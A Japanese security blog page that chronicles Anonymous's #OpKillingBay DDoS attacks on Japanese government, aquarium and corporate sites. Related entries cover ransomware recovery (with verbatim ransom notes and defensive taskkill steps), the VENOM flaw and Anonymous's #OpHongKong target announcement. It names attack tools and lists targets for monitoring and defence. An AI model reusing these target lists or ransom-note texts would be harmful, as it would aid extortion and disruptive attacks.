キーワード: アノニマス, anonymous, イルカ漁, OpKillingBay, DDoS攻撃, OpWhales

このエントリーをはてなブックマークに追加          

はじめに 

この記事は、アノニマス(Anonymous)によるDDoS攻撃などのサイバー攻撃を肯定するものではありません。アノニマスの #OpKillingBay オペレーションの動向を把握するためのまとめ記事です。今後も追加更新していく予定です。    
また、Twitterの情報を元に掲載しています。実際にDDoS攻撃によってダウンしたのかをすべて確認出来ているわけではありません。

概要 

アノニマス(Anonymous)のイルカ漁に抗議する #OpKillingBay オペレーションを行っています。この #OpKillingBay 自体は数年前から活動しており、以前からイルカ漁を行っている和歌山県太地町の公式ホームページなどのDDoS攻撃などを繰り返していました。2015年後半からさらに攻撃が頻繁になってきており、ASCII や成田空港、安倍総理公式ホームページなどの直接的な関係がないサイトも DDoS攻撃の被害にあっています。実際に攻撃しているアノニマスメンバーは、日本語が理解出来ていないようで攻撃対象がイルカ漁に関係しているかはあまり確認せずに攻撃を行っているようです。2016年に入ってからも、警察庁、金融庁、財務省などの官公庁も 攻撃対象とされ、実際に DDoS攻撃を受けてWebサイトが閲覧できない状態が長く続いている状況です。    
#OpKillingBay は、日本だけではなくイルカ漁・クジラ漁を行っている EU アイスランドやデンマークに対しても行われているようです。

    

2016年1月には ghostbin.com に、アノニマス #OpKillingBay の標的リストが掲載されています。これらのターゲットとなったサイトは、実際に攻撃を受ける可能性があるため警戒が必要です。以前のアノニマスのサイバー攻撃ではDDoS攻撃ツールであるLOIC(Low-Orbit Ion Canon)やWebサイトにアクセスするだけでDDoS攻撃に参加できるJavascript ベースの Webhive、SQL インジェクションツールの Havij などが多く使われていました。

    

#OpKillingBayでの DDoS攻撃のターゲット 

スポンサーリンク

  • 2016年9月14日 農林水産省 植物防疫所 PLANT PROTECTION STATION(https://www.jacar.go.jp/)に対してDDoS攻撃したとツイート。Connection timed out ではなく 403 Forbidden。元々ページが存在しなかったのかも  

  • 2016年9月4日 アジア歴史資料センター(https://www.jacar.go.jp/)に対してDDoS攻撃したとツイート    

  • 2016年4月1日 NTT(http://www.ntt.co.jp) に対してDDoS攻撃したことをツイート       

  • 2016年3月15日 三重大学に対してDDoS攻撃  

三重大にサイバー攻撃か HPに障害、「アノニマス」が声明

http://www.chunichi.co.jp/s/article/2016031590085351.html   

「イルカ研究」に反対して三重大学HPに対してDDoS攻撃を実施した模様

三重大学は、2016年度に鯨類の繁殖促進するための研究センターを設置する予定  

  • 10:03 - 2016年2月1日 動物を殺害する資金を出しているとして財務省をDDoS攻撃?  

  • 0:09 - 2016年2月1日 動物を殺害する資金を出しているとして金融庁金融庁をDDoS攻撃?(23:26 - 2016年1月31日分について)

  • 23:26 - 2016年1月31日 殺すための資金を止めろと主張して金融庁をDDoS攻撃    

  • 20:35 - 2016年1月29日 映画「ビハインド・ザ・コーヴ〜捕鯨問題の謎に迫る〜」 Behind "THE COVE" Official Site に DDoS攻撃    

  • 2016年1月27日 成田空港 #Anonymousは、@Techworm_in#OpKillingBay で「ザ ・ コーブ」のリック ・ オバリー拘束に抗議のため空港ウェブサイトをシャットダウン #Tangodown#Japan   

  • 2016年1月27日 警察庁       

  • 6:08 - 2016年1月27日 羽田空港ターミナル、中部国際空港 セントレア   

  • 0:24 - 2016年1月27日 厚生労働省、成田空港、南海エクスプレス    

  • 23:20 - 2016年1月26日 くじらを殺すのを止めろと主張し、株式会社まるげい をDDoS攻撃   

  • 21:46 - 2016年1月26日 株式会社まるげい クジラ販売に抗議にして「まるげい」をDDoS攻撃?
  • 21:56 - 2016年1月25日 厚生労働省  「殺害を今すぐ停止しろ」と主張    

  • 23:50 - 2016年1月26日 南海エクスプレス イルカ輸送に抗議    

  • 19:42 - 2016年1月24日 成田空港 (22:18 - 2016年1月22日分について)    

スポンサーリンク

  • 19:52 - 2016年1月24日 株式会社 ひのー|製菓製パン原材料メーカー|東京都目黒区 (7:01 - 2016年1月24日分について)       
  • 7:01 - 2016年1月24日  株式会社 ひのー|製菓製パン原材料メーカー|東京都目黒クジラ肉を販売に抗議 #OpWhales

  • 22:18 - 2016年1月22日 成田空港 ric の開放を要求 #OpKillingBay       
  • 11:11 - 2016年1月19日 ghostbin.com に攻撃ターゲットを公開        
    日本の政府サイト、イルカ輸送関連サイト、日本の水族館、和歌山・太地町関係、2020 東京オリンピック         
    三菱、三井、住友、楽天、銀行、JRなどが多数のWebサイトがターゲットとしてリストされている (https://ghostbin.com/paste/fdzhu)

  • 0:32 - 2016年1月13日  日産自動車ホームページ        
    殺すのを今すぐやめろと抗議    

  • 12:18 - 2015年12月11日 衆議院議員 安倍晋三 公式サイト 

  • 2015-12-08 06:16:20 IMATA - International Marine Animal Trainer's Association(https://www.imata.org/)をDDoS攻撃

@AnonFingers   
Complicit w/Taiji https://t.co/etKYj9mrEm #TangoDown #OpKillingBay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/iBCob6JPAe    
https://twitter.com/AnonFingers/status/673974345383841797/ 
  • 2015-12-07 20:38:41 鳥羽水族館公式ホームページ(http://aquarium.co.jp)をDDoS攻撃     

@AnonFingers      
https://t.co/iGi7RNBbtJ looks to be #TangoDown #OpKillingBay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/z1Qf4jZ98Y      
https://twitter.com/AnonFingers/status/673828974397546497/     

  • 2015-12-03 07:07:35 のとじま水族館 | 来て!見て!触れる!石川県の体験型水族館(http://www.notoaqua.jp)をDDoS攻撃 

@AnonFingers      
https://t.co/ArsTtWNYfE aquarium #TangoDown #OpKillingBay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/kz3QH9Yepo      
https://twitter.com/AnonFingers/status/672175303465144320/   

  • 2015-12-02 21:31:23 おたる水族館 | イルカの水しぶき、トドの豪快ダイブ、爆笑ペンギンショー、国定公園の大自然に囲まれた水族館(http://otaru-aq.jp/)をDDoS攻撃   

@AnonFingers      
Japan aquarium https://t.co/C1DxweiYDh #TangoDown #OpKillingBay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/adbU47zj9k      
https://twitter.com/AnonFingers/status/672030299509821443/   

@AnonFingers      
https://t.co/AIC5JcCF52 / chw.jp #TangoDown #opkillingbay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/iX9PPJM3oY      
https://twitter.com/AnonFingers/status/670314638706274304/  

  • 0:35 - 2015年11月28日 日本捕鯨協会ホームページ(http://whaling.jp/)をDDoS攻撃

スポンサーリンク

  • 2:02 - 2015年11月21日 日本の政府Webサイトとして厚生労働省ホームページ(http://mhlw.go.jp/)を攻撃 

   

2015-11-19 21:40:41 @OpKillingBay10      
#OpKillingBay #Japan https://t.co/S1iFBuUREt #TangoDown for the censoring the truth about #Taiji #TeamRektIt https://t.co/rWZbVGMC6e      
https://twitter.com/OpKillingBay10/status/667321594423869441/

  • 21:50 - 2015年11月9日 こだわりの名刺作成・印刷なら エコ名刺のecobe!(エコビー) (http://www.nissindou.co.jp/) の情報を ghostbin にリークしたとツイート(ghostbin の内容が消えていたのでリーク内容を確認できていません)

  • 10:59 - 2015年11月4日 毎日新聞のニュース・情報サイト(http://mainichi.jp/)を攻撃    

  • 3:26 - 2015年10月28日 殺害をやめ、動物を自由にしろと主張して 4つの水族館?を攻撃       
    体験型水族館とおもちゃ遊園地 南知多ビーチランド&南知多おもちゃ王国(愛知県知多半島)(http://www.beachland.jp/)        
    日本一のカエル館 富士山の見える水族館|あわしまマリンパーク(http://marinepark.jp/)        
    「環境水族館」アクアマリンふくしま(http://www.marine.fks.ed.jp/index.htm)        
    南海電鉄(http://www.nankai.co.jp/)   

  • 18:02 - 2015年10月23日 すべての日本のWebサイトにDDoS攻撃するとツイート

  • 4:17 - 2015年10月23日 日本の大手ニュース局として「東洋経済オンライン | 経済ニュースの新基準」(http://www.toyokeisai.net/)を攻撃  

  • 2:13 - 2015年10月22日 大手ITストア・IT企業として週刊アスキーなどを発行している ASCII.jp(https://ascii.jp/)を攻撃

  • 3:48 - 2015年10月15日 日本最大のオンラインストアとして ISP のぷららをDDoS攻撃 (http://www.plala.or.jp)        
    @ntsuji が Anonymous @_RektFaggot_ に対して「ぷらら」はISPだと指摘。@_RektFaggot_は日本語が読めない、ISPであればより良い?などのやり取りがあった。

  • 23:37 - 2015年10月10日 日本政府観光局にDDoS攻撃       
    Japan National Tourism Organization Web Site(http://www.jnto.go.jp/)

  • 12:46 - 2015年10月9日 The Japan News - Breaking News from Japan by The Yomiuri Shimbun 読売の英字新聞(http://the-japan-news.com/) 

  • 4:07 - 2015年10月9日 再び和歌山をシャットダウンすると宣言?

スポンサーリンク                     

関連リンク  

ランサムウェア TeslaCrypt 2.2.0 (vvvウイルス) で暗号化されたファイルの復元方法と対策

更新日: 2016-01-17

  

ランサムウェア TeslaCrypt 2.2.0 (vvvウイルス) で暗号化されたファイルの復元方法と対策

  

続きを読む "ランサムウェア TeslaCrypt 2.2.0 (vvvウイルス) で暗号化されたファイルの復元方法と対策" »

多数の仮想化プラットフォームに「ゲスト」から「ホスト」に攻撃可能な脆弱性が見つかる(CVE-2015-3456)

多数の仮想化プラットフォームに「ゲスト」から「ホスト」に攻撃可能な脆弱性が見つかる(CVE-2015-3456)

概要

米国のセキュリティ企業 CrowdStrike の研究者によって、QEMU の仮想フロッピードライブコントローラ(FDC)に、ゲスト側からホスト側に対して攻撃可能な深刻な脆弱性(CVE-2015-3456)が発見されました。XenやVirtualBox, RedHat, Ubuntu, KVM, Citrix, F5 Networks, FireEye など多数の仮想化プラットフォームにおいても同様の脆弱性が確認されています。この脆弱性(CVE-2015-3456)は、別名 VENOM(Virtualized Environment Neglected Operations Manipulation)と命名されています。

また、この脆弱性(CVE-2015-3456)は、仮想化プラットフォームのハイパーバイザーに存在するため、ホストOSの種類に関係なく影響を受けます。脆弱性を悪用してホストOSを攻撃するためには、ゲストOSの管理者権限を持っている必要があります。個人的に利用している場合は問題ないが、ホストOSを他人に貸し出すようなクラウドサービスなどでは対応が必要になります。

影響を受けるシステム

XenやVirtualBox, RedHat, Ubuntu, KVM, Citrix, F5 Networks, FireEye など

対策方法

RedHat や Ubuntu などのベンダーから修正パッチが提供されています。


PC内のファイルを暗号化して人質に取るウイルス(ランサムウェア)の復旧方法 - CryptoLocker, Crypt0L0cker, CTB-Locker など

PC内のファイルを暗号化して人質に取るウイルス(ランサムウェア)の復旧方法

更新日:2017-01-01 CryptXXX 復号可能に
2016-05-26 TeslaCrypt のマスターキーを公開、身代金を払わずに復号可能に。   


キーワード: ランサムウェア、CryptoLocker、Crypt0L0cker、CryptXXX, Petay, TeslaCrypt、VVV ウイルス、CTB-Locker、CoinVault、復旧、復号、復元ツール, Locky, Locky亜種, aesir, zzzzz, thor, osiris

このエントリーをはてなブックマークに追加  

スポンサーリンク

目次

1. 概要

2. ランサムウェアの種類

3. ランサムウェアを停止する方法

4. ランサムウェアを駆除する方法

5. ランサムウェアに暗号化されたファイルを復旧する方法

6. 関連リンク

1. 概要

PC内のファイルを暗号化して人質に取るウイルス(ランサムウェア)に感染した場合の対処方法について紹介したいと思います。一部のランサムウェアのみの対応ですが、暗号化された大事なファイルを身代金を払わずにファイルを復元する方法についても紹介します。

2. ランサムウェアの種類

PC内のファイルを暗号化して人質に取るウイルスは、ランサムウェア(ransomware)と呼ばれています。ランサムウェアには、いくつかの種類が存在します。種類やバージョンによって対処方法が異なります。

① CryptoLocker

CryptLocker ウイルスに感染して暗号化されたファイルは、拡張子に .encrypted が付加されます。

      

② Crypt0L0cker

CryptoLocker と似ているがアルファベット「o」 が数字の「0 」になっている。 CryptoLocker が英語の脅迫文を出すのに対して、Crypt0L0cker は日本語の脅迫文を表示する。

警告
日本の法律に違反するファイルがお使いのパソコンから検出されたため、パソコンをロックしました。    
ロックの解除をには、左に表示されている日時までに罰金として三十万円をBitcoinで氏は割らなければならない。    
この日時までに誠意ある対応なき場合は、ロックが解除されることは永遠にないでしょう。    
俺は君に人を傷付けるのではなく人を助ける人間になってほしい    
僕は君の20年後を見ている

      

③ TeslaCrypt (CrypTesla)

TeslaCrypt ウイルスはバージョンによって暗号化されたファイルに付加される拡張子名が異なります。拡張子名には「.aaa, .abc, .ccc, .ecc, .exx, ezz, .micro, .mp3, .ttt, .vvv, .xxx, .xyz, .zzz.」などになります。 拡張子名として .ecc, .exx, .ezz, .vvv が付加されるバージョンに関しては、暗号化されたファイルを復旧(復号)するTeslaDecoder というツールがリリースされています。


2016年5月中旬になって開発者が TeslaCrypt プロジェクトを終了、復号用のマスターキーを公開しました。
      

TeslaCrypt に、公開されたマスターキー「440A241DD80FCC5664E861989DB716E08CE627D8D40C7EA360AE855C727A49EE」を    
設定することで、身代金を払わずにファイルを復号できるようになりました。

TeslaDecoder は下記URL からダウンロードすることが出来ます。 http://download.bleepingcomputer.com/BloodDolly/TeslaDecoder.zip   
http://download.bleepingcomputer.com/BloodDolly/changelog.txt  

また、拡張子名が .vvv となるバージョンで暗号化されたファイルを復号する方法は、 下記を参照してください。

TeslaCrypt (vvvウイルス) で暗号化されたファイルの復元方法

http://rootdown.cocolog-nifty.com/memo/2016/01/cryptesla-vvv-6.html

  • TelaCrypt2 (vvv ウイルス)の脅迫文

---!!!==============================================================!!!!=========- 

What happened to your files ? All of your files were protected by a strong encryption with RSA-2048. More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) What does this mean ? This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them. How did this happen ? Especially for you, on our server was generated the secret key pair RSA-2048 - public and private. All your files were encrypted with the public key, which has been transferred to your computer via the Internet. ---!!!!=================================================!!!!========= Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server. What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BTC NOW, and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://rbtc23drs.7hdg13udd.com/7C66B96138xxxxxx 2. http://tsbfdsv.extr6mchf.com/7C66B96138xxxxxx 3. https://alcov44uvcwkrend.onion.to/7C66B96138xxxxxx If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization. 3. Type in the address bar: alcov44uvcwkrend.onion/7C66B96138xxxxxx 4. Follow the instructions on the site.IMPORTANT INFORMATION: Your personal pages:http://rbtc23drs.7hdg13udd.com/7C66B96138xxxxxx http://tsbfdsv.extr6mchf.com/7C66B96138xxxxxx https://alcov44uvcwkrend.onion.to/7C66B96138xxxxxx Your personal page (using TOR-Browser): alcov44uvcwkrend.onion/7C66B96138xxxxxx Your personal identification number (if you open the site (or TOR-Browser's) directly): 7C66B96138xxxxxx ---!!!===================================================!!!!=========  

  • TeslaCrypt (拡張子ECC)の脅迫文

脅迫 All your documents, photos, databases and other important files have been encrypted with strongest encryption RSA-2048 key, generated for this computer.

Private decryption key is stored on a secret Internet server and nobody can decrypt your files until you pay and obtain the private key.    
If you see the main encryptor red window, examine it and follow the instructions.    
Otherwise, it seems that you or your antivirus deleted the encryptor program.    
Now you have the last chance to decrypt your files.    
Open http://tkj3higtqlvohsxx.aw49f4j3nxx.com or http://tk3higtqlvohsxx.dfj3d8w3nxx.com, https://tkj3higtqlvohsxx.s5.tor-gateways.de/ in your browser.    
They are public gates to the secret server.    
Copy and paste the following Bitcoin address in the input from on server. Avoid missprints.
19i4AsfxqRivqw95Cb8RExxxxxxxxxxxxxxx&#
Follow the instructions on the server.

日本語訳(Google 翻訳)

すべてのドキュメント、写真、データベース、およびその他の重要なファイルは、このコンピュータ用に生成最も強力な暗号化RSA- 2048キーで暗号化されています。

秘密復号鍵は秘密のインターネットサーバーに格納されている、あなたが支払うと秘密鍵を取得するまで、誰もあなたのファイルを復号化することはできません。


あなたがメインの暗号化赤ウィンドウが表示された場合、それを確認し、指示に従ってください。    
それ以外の場合は、あなたやあなたのアンチウイルスは、暗号化プログラムを削除しているようです。
今、あなたはあなたのファイルを復号化するための最後のチャンスを持っています。    
お使いのブラウザでhttp://tkj3higtqlvohsxx.aw49f4j3nxx.comまたはhttp: //tk3higtqlvohsxx.dfj3d8w3nxx.com 、 https://tkj3higtqlvohsxx.s5.tor-gateways.de/を開きます。    
彼らは秘密のサーバーにパブリックゲートです。    
コピーし、サーバー上からの入力で、次のビットコインのアドレスを貼り付けます。 missprintsを避けます。    
19i4AsfxqRivqw95Cb8RExxxxxxxxxxxxxxx
サーバー上の指示に従ってください。

      

④ CoinVault  

  暗号化されたファイルを復元(復号)するサイトが Kaspersky によって提供されています。    
noransom - https://noransom.kaspersky.com

法執行機関とセキュリティ企業が、CoinValut の指揮統制サーバー(C&Cサーバ)を確保し、そのサーバー内の情報からファイルを復号するツールを作成したそうです。

      

⑤ Cryptowall4 

  Cryptowall4 では、ファイル名も含めて暗号化する機能が追加されています。どのファイルが暗号化されたのか特定することも難しくなっています。

⑥ Linux.Encoder.1 (encrypted ウイルス) 

Linux を標的としたランサムウェア。特定ディレクトリやファイルタイプのファイルが暗号化されて身代金を請求される。多くのLinux Web サーバで被害が出ている。暗号化されたファイルは、拡張子が「encrypted」となります。

⑦ Locky ウイルス

暗号化したファイルの拡張子が Locky となるランサムウェアです。脅迫文が多言語対応になっていて、日本語Windows では日本語の脅迫文が生成表示されます。メール添付ファイルや改ざんされたWebサイト経由で感染します。Locky ウイルスの詳細については、下記URLで紹介しています。

Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法

http://rootdown.cocolog-nifty.com/memo/2016/03/locky-virus---e.html 

 

3. ランサムウェアを停止する方法

ランサムウェアは自身が駆除されないように、アンチウイルスソフトやタスクマネージャ、コマンドプロンプトなどのプログラムを停止させる機能を持っています。この仕組みは、プログラム起動するとすぐに強制停止させるもので、プログラムは一瞬ですが実行することはできます。  

また、停止させるプログラムは、実行ファイル名で指定されていることが多く、プログラムのファイル名を変更することで強制停止されずに起動させることも可能な場合が多いです。

      

以下、実行ファイル名を変更したコマンドプロンプト cmd.exe を起動してtasklist、 taskkill を使ってランサムウェアを停止する方法です。

      

cryptolocker

      

(1) ランサムウェアの実行ファイル名の確認  

ディスクトップ上にあるランサムウェアのアイコン cryptolocker のプロンプトから、ランサムウェアのパスとファイル名を確認する。この例では以下のようになっていました。パスやファイル名は、感染PC毎に異なります。

C:\Documents and Settings\Admin\Application Data\bicjrya.exe

      

cryptolocker

(2) コマンドプロンプトのコピー

エクスプローラで cmd.exe (c:\windows\system32\cmd.exe) をコピーして、ファイル名を変更する。ここではディスクトップ上に cmd2.exe としてコピーする。

      

(3) コピーしたコマンドプロンプトの起動

(2) でコピーした cmd2.exe をダブルクリックして、コマンドプロンプトを起動する。Windows7 以降の場合は、ア右クリックで「管理者として実行」をクリックして起動する。

      

(4) tasklist で実行中プログラムの一覧取得  

(2) で起動したコマンドプロンプトで tasklist を実行し、実行中プログラム一覧を取得する。

  tasklist /FO LIST

(5) ランサムウェアのPID確認

(4) で取得した実行中プログラム一覧から、(1) で確認したランサムウェアの実行ファイル名と一致するイメージ名を探す。イメージ名の下にある PID の番号を確認する。  

イメージ名: bicjrya.exe
PID:
セッション名: Console
セッション#: 0
メモリ使用量: 11,848K

(6) taskkil でランサムウェアを停止する  

(5) で確認した PID を指定して taskkill を実行することで、ランサムウェアを停止させる。

taskkill /PID 1360 /F

(7) 終了

カウントダウンの表示が消えていれば、ランサムウェアが停止している状態になっています。消えない場合は、(6) を再度実行してみてください。

      

 

      

4. ランサムウェアを駆除する方法

(1) ランサムウェアの実行ファイルを削除

エクスプローラで 2. (1) で確認したランサムウェアを削除します

      

(2) ランダムウェアの自動起動設定を削除

レジストリエディタでも削除可能ですが、ここではマイクロソフトが提供している sysinternals suite に含まれる autoruns を使って、自動起動設定を削除します

https://technet.microsoft.com/ja-jp/sysinternals/bb963902.aspx

上記URLから autoruns をダウンロードして、autoruns.exe をダブルクリックすると   
autoruns が起動します。

 
autoruns の Filter に 2. (1) で確認したランサムウェアの実行ファイル名を入力します。入力が終わるとランサムウェアを実行するためのレジストリ設定が表示されます。

 
ここでは、「bicjrya.exe」を入力し、下記2つのレジストリが表示されました。

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msdedf    
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msdedf

      

すべてのレジストリのチェックボックスをオンにして、上部のバッテンマークを押すと、設定を削除することが出来ます。

cryptolocker

      

また、警告文を表示するための設定も削除します。   
同じく autoruns に HELP_RESTORE_FILE を入力すると、関連する設定が表示されます。すべてチェックボックスをオンにしてバッテンマークで削除します。

cryptolocker

さらに、背景の壁紙に表示されている警告メッセージは、壁紙設定から元に戻すことが出来ます。

      

5. ランサムウェアに暗号化されたファイルを復旧する方法

(1) 暗号化されたファイルの復号/復元ツール、サイト(Decrypt, Recovery Tool, Decoder 

  • TeslaCrypt2 (vvv ウイルス)によって暗号化されたファイルを復元するツール      

TeslaCrack https://github.com/Googulator/TeslaCrack

TeslaCrack を使った vvvウイルスによって暗号化されたファイルの詳しい復号手順については、下記URLに記載しています。 

        

TeslaCrypt (vvvウイルス) で暗号化されたファイルの復元方法http://rootdown.cocolog-nifty.com/memo/2016/01/cryptesla-vvv-6.html

     
  • TeslaCrypt (vvvウイルスではない) によって暗号化されたファイルを       
    復元するツールを提供しているサイト
     

暗号化されたファイルの拡張子は「ecc」、TeslaCrypt の亜種である AlphaCrypt では拡張子が「ezz」となっています。  

拡張子が「zzz」となるTeslaCrypt の亜種(vvvウイルス)による被害が、広告配信や改ざんされたWebサイト経由で広がっているようです。パッチが出ていない 0dayの脆弱性を狙った攻撃でなければ、Flash Player, Adobe Reader, Java, IE, Windows Update などを最新版にアップデートすることで感染を防ぐことができます。 

Threat Spotlight: TeslaCrypt – Decrypt It Yourself http://blogs.cisco.com/security/talos/teslacrypt

decryptor

No More Ransom!   https://www.nomoreransom.org/

ID Ransomware   https://id-ransomware.malwarehunterteam.com/

             

      

      

(2) ボリュームシャドーコピーから復旧

Windows Vista/7 以降ではボリュームシャドーコピーというサービス(Volume Shadow Copy Service: VSS)が提供されている。このサービスを使うことで誤って削除してしまったファイルや、上書きしてしまったファイルなどを復元することができる。 

(3) バックアップから復旧

      

6. 関連リンク

アノニマス(Anonymous)が中国・香港の政府への攻撃を予告 #OpHongKong/#OpHK/#OcuppyHK 2014年10月10日

アノニマス(Anonymous)が中国・香港の政府への攻撃を予告 #OpHongKong/#OpHK 2014年10月10日

                                   

概要

アノニマス(Anonymous)は、10月10日、サイバー攻撃によって中国と香港の政府ウェブサイトをサービス停止させ、政府関係の電子メールアドレス情報を流出させると予告した。この攻撃予定日は10月11日、攻撃対象は中国の公安省、香港警察、国防省、司法省などとなっている。

「中国よ、われわれを止めることはできない。香港市民に対して権力を乱用する前にわれわれの攻撃を予想するべきだった」との声明を発表しており、香港での民主的な選挙を求める抗議と見られる。

今回のアノニマス(Anonymous)のオペレーション名は #OpHongKong、#OpHK, #OccupyHK となっている。


予告原文

#Anonymous
#AntiSec

@AnonymousGlobo
@OpHongKong

October 11th starting at 1pm MST we will be conducting the #OpHongKong twitterstorm.

A message to the Chinese Government:

This twitterstorm is to show how much support we have around the world.  To prove our point to you, if it is not clear as of now, we will also be launching a mass DDoS attack on Chinese Government servers.  Here's your heads up, prepare for us, try to stop it, the only success you will have will be taking all your sites offline.

Here, we'll even help you out:
Some of our top targets:
www.mps.gov.cn - Chinese Police
www.police.gov.hk - Hong Kong Police
www.mod.gov.cn - Ministry of Defence of China
www.moj.gov.cn - Ministry of Justice for China

China, you cannot stop us.
You should have expected us before abusing your power against the citizens of Hong Kong
We Are Anonymous
We Don't Forgive
We Don't Forget
We Stand in Solidarity with the Citizens of Hong Kong
Chinese Government, October 11th, Expect us.

攻撃・被害状況

  • nftz.gov.cn のデータベースから500件以上のメールアドレスをリーク
    hxxp://pastebin.com/uwf●jurt

  • 2014/10/12~、An0nymousAsia が上海商業銀行(http://ww.shacombank.com.hk/)に対してDDoS攻撃を行う WebHIVE を公開
    ※WebHIVEにアクセスすると自動的に攻撃に加担することになってしまうため注意が必要

    OpHongkon


  • http://www.tlnbcq.gov.cn/ が改ざんされている(2014-10-15)

    ophk-tlnbcq

参考URL


    ワイモバイルが1321人分の個人情報を含んだPCを紛失

    ワイモバイルが1321人分の個人情報を含んだPCを紛失

    概要

    2014年8月15日、ワイモバイル(旧イー・モバイル)が運営していたコミュニティサイト「つながるマップ」の登録者 1,321人分の個人情報を含むパソコンを紛失したと発表した。個人情報に含まれる情報は、住所、氏名、生年月日、メールアドレス等であり、クレジットカードの情報などは含まれていないとのこと。(「つながるマップ」には、クレジットカード情報の登録はなかった)

    2014年8月2日に該当パソコンを紛失したことが判明、8月15日にパソコン内に「つながるマップ」の利用者情報が入っていたことが判明したとのこと。

    参考URL

    より以前の記事一覧

    記事一覧

    スポンサードリンク


    Twitter


    無料ブログはココログ

    ブログ検索